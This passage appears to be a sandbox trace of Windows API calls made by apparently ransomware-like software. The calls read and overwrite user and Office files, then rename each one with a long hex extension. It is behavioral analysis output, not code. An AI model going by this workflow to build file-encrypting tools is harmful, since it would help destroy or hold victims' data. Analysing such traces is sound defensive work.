lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0170.238] WriteFile (in: hFile=0x5fc, lpBuffer=0x7779140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7759008 | out: lpBuffer=0x7779140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7759008) returned 1 [0170.240] RtlInterlockedCompareExchange64 () returned 0x0 [0170.240] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0170.241] NtQueryObject (in: Handle=0x5fc, ObjectInformationClass=0x1, ObjectInformation=0x77590b8, ObjectInformationLength=0x10004, ReturnLength=0x72aff5c | out: ObjectInformation=0x77590b8, ReturnLength=0x72aff5c) returned 0x0 [0170.243] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\Default\\AppData\\Local\\IconCache.db", lpString2=".A1A9CC31DE2442FB9DF5A5994B8CC6F7BF1663340B2F19B3AB2E1408D8337355" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\Default\\AppData\\Local\\IconCache.db.A1A9CC31DE2442FB9DF5A5994B8CC6F7BF1663340B2F19B3AB2E1408D8337355") returned="\\Device\\HarddiskVolume1\\Users\\Default\\AppData\\Local\\IconCache.db.A1A9CC31DE2442FB9DF5A5994B8CC6F7BF1663340B2F19B3AB2E1408D8337355" [0170.243] GetProcessHeap () returned 0x270000 [0170.243] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x114) returned 0x4334650 [0170.243] NtSetInformationFile (FileHandle=0x5fc, IoStatusBlock=0x72aff4c, FileInformation=0x4334650, Length=0x114, FileInformationClass=0xa) returned 0x0 [0170.244] CloseHandle (hObject=0x5fc) returned 1 [0170.245] GetProcessHeap () returned 0x270000 [0170.247] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7759008 | out: hHeap=0x270000) returned 1 [0170.248] 
RtlInterlockedCompareExchange64 () returned 0x1 [0170.248] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0170.351] ReadFile (in: hFile=0x604, lpBuffer=0x75ca140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x75aa008 | out: lpBuffer=0x75ca140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x75aa008) returned 1 [0170.357] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0170.358] WriteFile (in: hFile=0x5cc, lpBuffer=0x7400180*, nNumberOfBytesToWrite=0x2e00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x73e0048 | out: lpBuffer=0x7400180*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x73e0048) returned 1 [0170.395] RtlInterlockedCompareExchange64 () returned 0x0 [0170.395] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0170.902] ReadFile (in: hFile=0x5b0, lpBuffer=0x78e1140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x78c1008 | out: lpBuffer=0x78e1140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x78c1008) returned 1 [0170.903] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0170.914] WriteFile (in: hFile=0x5cc, lpBuffer=0x7909298*, 
nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x0, lpOverlapped=0x78e9160 | out: lpBuffer=0x7909298*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x78e9160) returned 1 [0170.915] RtlInterlockedCompareExchange64 () returned 0x0 [0170.915] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0171.690] ReadFile (in: hFile=0x5f0, lpBuffer=0x75526e0, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x75325a8 | out: lpBuffer=0x75526e0*, lpNumberOfBytesRead=0x0, lpOverlapped=0x75325a8) returned 1 [0171.690] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0171.691] WriteFile (in: hFile=0x5dc, lpBuffer=0x76b0140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7690008 | out: lpBuffer=0x76b0140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7690008) returned 1 [0171.838] RtlInterlockedCompareExchange64 () returned 0xa [0171.838] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0171.894] ReadFile (in: hFile=0x5f4, lpBuffer=0x757a838, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x755a700 | out: lpBuffer=0x757a838*, lpNumberOfBytesRead=0x0, lpOverlapped=0x755a700) returned 1 [0171.894] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, 
dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0171.923] NtQueryObject (in: Handle=0x58c, ObjectInformationClass=0x1, ObjectInformation=0x73e00f8, ObjectInformationLength=0x10004, ReturnLength=0x72aff5c | out: ObjectInformation=0x73e00f8, ReturnLength=0x72aff5c) returned 0x0 [0171.924] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3", lpString2=".BB0A018A1F6A4DC5356C8A1FFCCB4D3D14BD67F26ED469B9154C601061010F50" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3.BB0A018A1F6A4DC5356C8A1FFCCB4D3D14BD67F26ED469B9154C601061010F50") returned="\\Device\\HarddiskVolume1\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3.BB0A018A1F6A4DC5356C8A1FFCCB4D3D14BD67F26ED469B9154C601061010F50" [0171.924] GetProcessHeap () returned 0x270000 [0171.924] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x120) returned 0x4334778 [0171.924] NtSetInformationFile (FileHandle=0x58c, IoStatusBlock=0x72aff4c, FileInformation=0x4334778, Length=0x120, FileInformationClass=0xa) returned 0x0 [0171.926] CloseHandle (hObject=0x58c) returned 1 [0171.928] GetProcessHeap () returned 0x270000 [0171.931] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73e0048 | out: hHeap=0x270000) returned 1 [0171.940] RtlInterlockedCompareExchange64 () returned 0xb [0171.940] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0171.988] WriteFile (in: hFile=0x5f4, lpBuffer=0x757a838*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x755a700 | out: lpBuffer=0x757a838*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x755a700) returned 1 [0171.989] RtlInterlockedCompareExchange64 () 
returned 0xa [0171.989] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0172.018] NtQueryObject (in: Handle=0x5fc, ObjectInformationClass=0x1, ObjectInformation=0x75aa0b8, ObjectInformationLength=0x10004, ReturnLength=0x72aff5c | out: ObjectInformation=0x75aa0b8, ReturnLength=0x72aff5c) returned 0x0 [0172.019] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3", lpString2=".D43BAE335ED8496E3AB6E5AF2E66293946BB36C1BD6471CD838B5929F7C5551B" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3.D43BAE335ED8496E3AB6E5AF2E66293946BB36C1BD6471CD838B5929F7C5551B") returned="\\Device\\HarddiskVolume1\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3.D43BAE335ED8496E3AB6E5AF2E66293946BB36C1BD6471CD838B5929F7C5551B" [0172.019] GetProcessHeap () returned 0x270000 [0172.019] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x13e) returned 0x7418c00 [0172.019] NtSetInformationFile (FileHandle=0x5fc, IoStatusBlock=0x72aff4c, FileInformation=0x7418c00, Length=0x13e, FileInformationClass=0xa) returned 0x0 [0172.060] CloseHandle (hObject=0x5fc) returned 1 [0172.061] GetProcessHeap () returned 0x270000 [0172.063] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75aa008 | out: hHeap=0x270000) returned 1 [0172.064] RtlInterlockedCompareExchange64 () returned 0xb [0172.064] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0172.065] NtQueryObject (in: Handle=0x5dc, ObjectInformationClass=0x1, 
ObjectInformation=0x76900b8, ObjectInformationLength=0x10004, ReturnLength=0x72aff5c | out: ObjectInformation=0x76900b8, ReturnLength=0x72aff5c) returned 0x0 [0172.066] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg", lpString2=".D692B6E2E2C95E4F5AA4BFA67FB91D9725586614388FF69189D96EE904A60558" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg.D692B6E2E2C95E4F5AA4BFA67FB91D9725586614388FF69189D96EE904A60558") returned="\\Device\\HarddiskVolume1\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg.D692B6E2E2C95E4F5AA4BFA67FB91D9725586614388FF69189D96EE904A60558" [0172.066] GetProcessHeap () returned 0x270000 [0172.066] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x132) returned 0x7418d48 [0172.066] NtSetInformationFile (FileHandle=0x5dc, IoStatusBlock=0x72aff4c, FileInformation=0x7418d48, Length=0x132, FileInformationClass=0xa) returned 0x0 [0172.068] CloseHandle (hObject=0x5dc) returned 1 [0172.070] GetProcessHeap () returned 0x270000 [0172.071] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7690008 | out: hHeap=0x270000) returned 1 [0172.071] RtlInterlockedCompareExchange64 () returned 0xa [0172.071] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0172.071] NtQueryObject (in: Handle=0x5f0, ObjectInformationClass=0x1, ObjectInformation=0x7532658, ObjectInformationLength=0x10004, ReturnLength=0x72aff5c | out: ObjectInformation=0x7532658, ReturnLength=0x72aff5c) returned 0x0 [0172.073] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\Public\\Pictures\\Sample Pictures\\Tulips.jpg", lpString2=".7998BE5AC3D5030D4CDA6E04EF4EDC32FF2DE75F5DF16286E8A46475B00CD32B" | out: 
lpString1="\\Device\\HarddiskVolume1\\Users\\Public\\Pictures\\Sample Pictures\\Tulips.jpg.7998BE5AC3D5030D4CDA6E04EF4EDC32FF2DE75F5DF16286E8A46475B00CD32B") returned="\\Device\\HarddiskVolume1\\Users\\Public\\Pictures\\Sample Pictures\\Tulips.jpg.7998BE5AC3D5030D4CDA6E04EF4EDC32FF2DE75F5DF16286E8A46475B00CD32B" [0172.073] GetProcessHeap () returned 0x270000 [0172.073] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x124) returned 0x4333b68 [0172.073] NtSetInformationFile (FileHandle=0x5f0, IoStatusBlock=0x72aff4c, FileInformation=0x4333b68, Length=0x124, FileInformationClass=0xa) returned 0x0 [0172.075] CloseHandle (hObject=0x5f0) returned 1 [0172.077] GetProcessHeap () returned 0x270000 [0172.079] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75325a8 | out: hHeap=0x270000) returned 1 [0172.086] RtlInterlockedCompareExchange64 () returned 0x9 [0172.086] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0172.086] NtQueryObject (in: Handle=0x5f4, ObjectInformationClass=0x1, ObjectInformation=0x755a7b0, ObjectInformationLength=0x10004, ReturnLength=0x72aff5c | out: ObjectInformation=0x755a7b0, ReturnLength=0x72aff5c) returned 0x0 [0172.087] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv", lpString2=".51AAD519F9EB2E5C0B1A060258A5CB55678B5C711F2F5B8C3F88B36584086C7B" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv.51AAD519F9EB2E5C0B1A060258A5CB55678B5C711F2F5B8C3F88B36584086C7B") returned="\\Device\\HarddiskVolume1\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv.51AAD519F9EB2E5C0B1A060258A5CB55678B5C711F2F5B8C3F88B36584086C7B" [0172.087] GetProcessHeap () returned 0x270000 [0172.087] RtlAllocateHeap (HeapHandle=0x270000, 
Flags=0x8, Size=0x120) returned 0x43349c8 [0172.088] NtSetInformationFile (FileHandle=0x5f4, IoStatusBlock=0x72aff4c, FileInformation=0x43349c8, Length=0x120, FileInformationClass=0xa) returned 0x0 [0172.101] CloseHandle (hObject=0x5f4) returned 1 [0172.102] GetProcessHeap () returned 0x270000 [0172.104] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x755a700 | out: hHeap=0x270000) returned 1 [0172.106] RtlInterlockedCompareExchange64 () returned 0x8 [0172.106] GetQueuedCompletionStatus (CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff) Thread: id = 111 os_tid = 0xad0 [0142.356] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0155.283] ReadFile (in: hFile=0x594, lpBuffer=0x74401a0, nNumberOfBytesToRead=0x5600, lpNumberOfBytesRead=0x0, lpOverlapped=0x7420068 | out: lpBuffer=0x74401a0*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7420068) returned 1 [0155.284] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0155.303] WriteFile (in: hFile=0x594, lpBuffer=0x74401a0*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7420068 | out: lpBuffer=0x74401a0*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7420068) returned 1 [0155.304] RtlInterlockedCompareExchange64 () returned 0x0 [0155.304] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, 
lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0155.305] NtQueryObject (in: Handle=0x594, ObjectInformationClass=0x1, ObjectInformation=0x7420118, ObjectInformationLength=0x10004, ReturnLength=0x73dfc54 | out: ObjectInformation=0x7420118, ReturnLength=0x73dfc54) returned 0x0 [0155.306] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\en-us.16\\stream.x86.en-us.man.dat", lpString2=".95A3B63F803AD7F8A4EBC90442E1802AC57768899BA6BEA3B832FF98690AAB26" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\en-us.16\\stream.x86.en-us.man.dat.95A3B63F803AD7F8A4EBC90442E1802AC57768899BA6BEA3B832FF98690AAB26") returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\en-us.16\\stream.x86.en-us.man.dat.95A3B63F803AD7F8A4EBC90442E1802AC57768899BA6BEA3B832FF98690AAB26" [0155.306] GetProcessHeap () returned 0x270000 [0155.306] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x192) returned 0x432e108 [0155.306] NtSetInformationFile (FileHandle=0x594, IoStatusBlock=0x73dfc44, FileInformation=0x432e108, Length=0x192, FileInformationClass=0xa) returned 0x0 [0155.308] CloseHandle (hObject=0x594) returned 1 [0155.331] GetProcessHeap () returned 0x270000 [0155.332] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7420068 | out: hHeap=0x270000) returned 1 [0155.332] RtlInterlockedCompareExchange64 () returned 0x1 [0155.332] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0155.340] ReadFile (in: hFile=0x590, lpBuffer=0x74401a0, nNumberOfBytesToRead=0x5200, lpNumberOfBytesRead=0x0, lpOverlapped=0x7420068 | out: lpBuffer=0x74401a0*, 
lpNumberOfBytesRead=0x0, lpOverlapped=0x7420068) returned 1 [0155.341] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0155.355] WriteFile (in: hFile=0x590, lpBuffer=0x74401a0*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7420068 | out: lpBuffer=0x74401a0*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7420068) returned 1 [0155.356] RtlInterlockedCompareExchange64 () returned 0x0 [0155.356] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0155.375] WriteFile (in: hFile=0x58c, lpBuffer=0x7420190*, nNumberOfBytesToWrite=0x600, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7400058 | out: lpBuffer=0x7420190*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7400058) returned 1 [0155.377] RtlInterlockedCompareExchange64 () returned 0x0 [0155.377] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0155.422] WriteFile (in: hFile=0x5a0, lpBuffer=0x747b318*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x0, lpOverlapped=0x745b1e0 | out: lpBuffer=0x747b318*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x745b1e0) returned 1 [0155.423] RtlInterlockedCompareExchange64 () returned 0x0 [0155.423] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: 
lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0155.435] WriteFile (in: hFile=0x5a0, lpBuffer=0x747b318*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x745b1e0 | out: lpBuffer=0x747b318*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x745b1e0) returned 1 [0155.437] RtlInterlockedCompareExchange64 () returned 0x0 [0155.437] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0155.781] WriteFile (in: hFile=0x5a0, lpBuffer=0x747b318*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x745b1e0 | out: lpBuffer=0x747b318*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x745b1e0) returned 1 [0155.781] RtlInterlockedCompareExchange64 () returned 0x0 [0155.782] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0155.782] NtQueryObject (in: Handle=0x5a0, ObjectInformationClass=0x1, ObjectInformation=0x745b290, ObjectInformationLength=0x10004, ReturnLength=0x73dfc54 | out: ObjectInformation=0x745b290, ReturnLength=0x73dfc54) returned 0x0 [0155.783] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\UserManifest.xml", lpString2=".12AEB737F53DF5206D67A88FC31DBB80F6DFA37803B629D2CBC6E144026E586B" | out: 
lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\UserManifest.xml.12AEB737F53DF5206D67A88FC31DBB80F6DFA37803B629D2CBC6E144026E586B") returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\UserManifest.xml.12AEB737F53DF5206D67A88FC31DBB80F6DFA37803B629D2CBC6E144026E586B" [0155.783] GetProcessHeap () returned 0x270000 [0155.783] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x1fc) returned 0x318780 [0155.783] NtSetInformationFile (FileHandle=0x5a0, IoStatusBlock=0x73dfc44, FileInformation=0x318780, Length=0x1fc, FileInformationClass=0xa) returned 0x0 [0155.785] CloseHandle (hObject=0x5a0) returned 1 [0155.872] GetProcessHeap () returned 0x270000 [0155.874] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x745b1e0 | out: hHeap=0x270000) returned 1 [0155.874] RtlInterlockedCompareExchange64 () returned 0x1 [0155.874] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0155.941] ReadFile (in: hFile=0x594, lpBuffer=0x74421a0, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x7422068 | out: lpBuffer=0x74421a0*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7422068) returned 1 [0155.942] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0155.943] WriteFile (in: hFile=0x594, lpBuffer=0x74421a0*, nNumberOfBytesToWrite=0x8000, 
lpNumberOfBytesWritten=0x0, lpOverlapped=0x7422068 | out: lpBuffer=0x74421a0*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7422068) returned 1 [0155.945] RtlInterlockedCompareExchange64 () returned 0x0 [0155.945] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0155.946] NtQueryObject (in: Handle=0x594, ObjectInformationClass=0x1, ObjectInformation=0x7422118, ObjectInformationLength=0x10004, ReturnLength=0x73dfc54 | out: ObjectInformation=0x7422118, ReturnLength=0x73dfc54) returned 0x0 [0155.947] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Access.Access.x-none.msi.16.x-none.xml", lpString2=".CF0325AE3BFBC36E4747FC53850D13F832880B59E4AF77E17167DBF6F1FA7D49" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Access.Access.x-none.msi.16.x-none.xml.CF0325AE3BFBC36E4747FC53850D13F832880B59E4AF77E17167DBF6F1FA7D49") returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Access.Access.x-none.msi.16.x-none.xml.CF0325AE3BFBC36E4747FC53850D13F832880B59E4AF77E17167DBF6F1FA7D49" [0155.947] GetProcessHeap () returned 0x270000 [0155.947] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x1b8) returned 0x42fc110 [0155.947] NtSetInformationFile (FileHandle=0x594, IoStatusBlock=0x73dfc44, FileInformation=0x42fc110, Length=0x1b8, FileInformationClass=0xa) returned 0x0 [0155.949] CloseHandle (hObject=0x594) returned 1 [0155.952] GetProcessHeap () returned 0x270000 